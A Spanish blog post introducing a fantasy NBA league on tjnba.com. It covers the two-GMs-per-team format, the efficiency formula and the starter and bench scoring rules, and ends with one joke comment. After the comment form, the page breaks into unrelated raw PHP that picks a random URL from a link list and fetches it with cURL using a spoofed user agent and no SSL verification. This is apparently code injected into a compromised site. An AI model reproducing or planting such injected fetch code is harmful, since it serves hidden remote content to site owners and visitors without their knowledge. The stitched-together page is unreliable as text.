VFL: Presentación

30 de November de 2007 por txusma

Existen en el mundo innumerables ligas fantásticas de la NBA. Las más famosas, como las de NBA.com o Yahoo, tienen miles de participantes y otras más modestas tienen una treintena, más o menos. Cualquiera puede hacerse una liga fantástica a su medida y echarse unos partiditos con sus amigos poniendo tan sólo en juego la honrilla personal. En tjnba.com también tenemos montada una liga fantástica hecha a nuestro gusto desde el primer detalle hasta el último. 32 General Managers ponen en juego sus conocimientos de la NBA, sus habilidades en las negociaciones, su capacidad para encontrar información e incluso en ocasiones, sus nociones de psicología. La primera diferencia palpable es que tan sólo hay 16 equipos y cualquiera con pequeños conocimientos matemáticos puede comprobar que de esta manera cada equipo está controlado por 2 GM’s. Ésta es, sin duda, la mayor grandeza de la liga.

Desde tjnba.com hemos decidido presentaros esta liga e irla radiando como si la liga oficial se tratase. Os comentaremos los partidos, las clasificaciones, los traspasos que se produzcan y cualquier otra cosa que pueda ser de vuestro interés. Mediante estos artículos también podréis extraer información valiosa para vuestra liga fantástica: los jugadores que están más en forma, los que seguro mejorarán en un futuro, los que se están arrastrando por la canchas y los que tan sólo pasan por un buen momento. De una manera, esperemos, amena y divertida, os haremos partícipes de los entresijos y quien sabe, a lo mejor finalmente algún GM os pedirá consejo o acabe leyendo vuestros comentarios con muchísimo interés.

Pero para poder zambullirse pleno lo mejor es conocer antes la piscina.

 

Os podría copiar las 8 páginas de normas redactadas desde 0 que tenemos. Normas que nos han costado sangre porque en esta liga todo lo decidimos entre todos y evidentemente no todos pensamos igual. Pero no valdría la pena así que tan sólo os explicaré lo básico para poder disfrutar al máximo de los siguientes artículos.Los 16 equipos (que para otro día ya os presentaré más detalladamente) están divididos en 2 conferencias y cada conferencia en 2 divisiones. Después de 28 partidos se clasifican para los playoffs los mejores de cada división más los dos mejores equipos restantes de la conferencia.

En los partidos lo más importantes es la eficiencia de los jugadores. Este número se calcula muy fácilmente mediante esta fórmula:

Eff = Puntos + rebotes + asistencias + robos + tapones – pérdidas – tiros de campo fallados – tiros libres fallados

Cada plantilla se compone de 16 jugadores. Éstos pueden ocupar una o más posiciones de las típicas de la NBA (PG, SG, SF, PF y C) y en cada partido un equipo ha de presentar un quinteto titular cubriendo estrictamente todas las posiciones. Además en el banquillo (formado por un llamado “sexto hombre” y 6 jugadores más) es obligatorio tener un reserva por posición. La eficiencia que se toma para efectos de cálculo es la media de las eficiencias de los partidos NBA que se tengan en cuenta en cada jornada. Si un jugador no ha jugado algún partido de su equipo sea por decisión técnica o lesión puntua como cero en ese partido. Una vez calculada la media, el jugador aporta la totalidad de su puntuación a la puntuación del equipo si forma parte del quinteto titular, el sexto hombre puntua completo si el partido es jugado en casa del equipo y la mitad si el partido se juega fuera y los suplentes puntuan la mitad. La suma total determinará el marcador del equipo. Por eso es muy importante una buena elección del quinteto inicial.

Y así a grandes a rasgos funciona la liga. Después hay muchas normas sobre salarios, agentes libres, traspasos, draft, post-temporada, etc… Pero a efectos prácticos éstas son las más interesantes.

En el próximo artículo prometo presentaros cada uno de los equipos con un pequeño analísis para que podáis empezaros a declarar fans de uno o de otro.

Comenta

Un comentario a esta entrada

  1. Dantley dice:
    #1

    Enorme idea. Es una forma de dar información de manera amena

    ¡¡¡Vendo jugadores de los Knicks!!! Barato, oiga ¡¡¡

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>